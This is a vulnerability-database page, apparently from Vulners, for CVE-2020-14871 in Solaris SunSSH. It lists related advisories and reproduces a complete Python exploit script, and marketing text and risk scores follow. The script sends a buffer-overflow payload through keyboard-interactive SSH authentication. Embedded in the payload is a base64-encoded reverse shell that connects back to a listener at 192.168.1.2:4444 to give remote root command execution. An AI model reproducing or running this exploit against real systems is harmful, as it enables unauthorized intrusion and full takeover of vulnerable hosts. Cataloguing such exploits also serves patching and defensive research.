Vulners
Lucene search
Solaris SunSSH 11.0 x86 - libpam Remote Root Exploit
| Reporter | Title | Published | Views | Family All 44 |
|---|---|---|---|---|
 | SunSSH 11.0 x86 - libpam Remote Root Exploit | 15 Dec 202000:00 | – | zdt |
| Oracle Solaris SunSSH PAM parse_user_name() Buffer Overflow Exploit | 17 Dec 202000:00 | – | zdt |
| Solaris SunSSH 11.0 x86 - libpam Remote Root Exploit (3) | 21 Jun 202100:00 | – | zdt |
 | exploits | 25 May 202601:12 | – | githubexploit |
 | CVE-2020-14871 | 21 Oct 202000:00 | – | attackerkb |
 | Last Week’s Security news: Cisco ASA, BIG-IQ, vSphere, Solaris, Dlink, iPhone %s, DarkRadiation, Google schema, John McAfee | 28 Jun 202110:59 | – | avleonov |
 | CVE-2020-14871 | 2 Nov 202019:35 | – | circl |
 | Oracle Solaris and Zettabyte File System (ZFS) Unspecified Vulnerability | 3 Nov 202100:00 | – | cisa_kev |
 | Oracle Solaris Remote Code Execution Vulnerability | 26 Oct 202000:00 | – | cnvd |
 | Oracle Solaris Buffer Overflow (CVE-2020-14871) | 11 Nov 202000:00 | – | checkpoint_advisories |
10
# Exploit Title: Solaris SunSSH 11.0 x86 - libpam Remote Root (2)
# Original Exploit Author: Hacker Fantastic
# Metasploit Module Author: wvu
# Vendor Homepage: https://www.oracle.com/solaris/technologies/solaris10-overview.html
# Version: 10
# Tested on: SunOS solaris 10
# CVE: CVE-2020-14871
# Ported By: legend
import socket
import paramiko
from time import sleep
payload = b"A"*516+ b"\x04\x39\xbb\xfe" + b"\x19\xf8\xf0\x14" + b"\x01\x01\x04\x08" + b"\x07\xba\x05\x08" + b"\xd0\x56\xbb\xfe" + b"\xdf\x1e\xc2\xfe" + b"\x8c\x60\xfe\x56" + b"\xf1\xe3\xc3\xfe"
payload+=b"python${IFS}-c${IFS}\""
# msfvenom -p python/shell_reverse_tcp -b "\x00\x09\x20" LHOST=192.168.1.2 LPORT=4444
payload+=b"exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCBhcyBzCmltcG9ydCBzdWJwcm9jZXNzIGFzIHIKc289cy5zb2NrZXQocy5BRl9JTkVULHMuU09DS19TVFJFQU0pCnNvLmNvbm5lY3QoKCcxOTIuMTY4LjEuMicsNDQ0NCkpCndoaWxlIFRydWU6CglkPXNvLnJlY3YoMTAyNCkKCWlmIGxlbihkKT09MDoKCQlicmVhawoJcD1yLlBvcGVuKGQsc2hlbGw9VHJ1ZSxzdGRpbj1yLlBJUEUsc3Rkb3V0PXIuUElQRSxzdGRlcnI9ci5QSVBFKQoJbz1wLnN0ZG91dC5yZWFkKCkrcC5zdGRlcnIucmVhZCgpCglzby5zZW5kKG8pCg==')[0]))"
payload+=b"\""
print("Length => %d" % (len(payload)))
def inter_handler(title, instructions, prompt_list):
resp = [] #Initialize the response container
for pr in prompt_list:
print(pr)
if pr[0].startswith('Please enter user name:'):
sleep(10)
resp.append(payload)
print("Your payload is sended check your nc")
return tuple(resp)
import socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("192.168.1.2", 22))
ts = paramiko.Transport(sock)
ts.start_client(timeout=10)
ts.auth_interactive(username="", handler=inter_handler)
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
22 May 2021 00:00Current
0.5Low risk
Vulners AI Score0.5
CVSS 3.110
CVSS 210
EPSS0.88872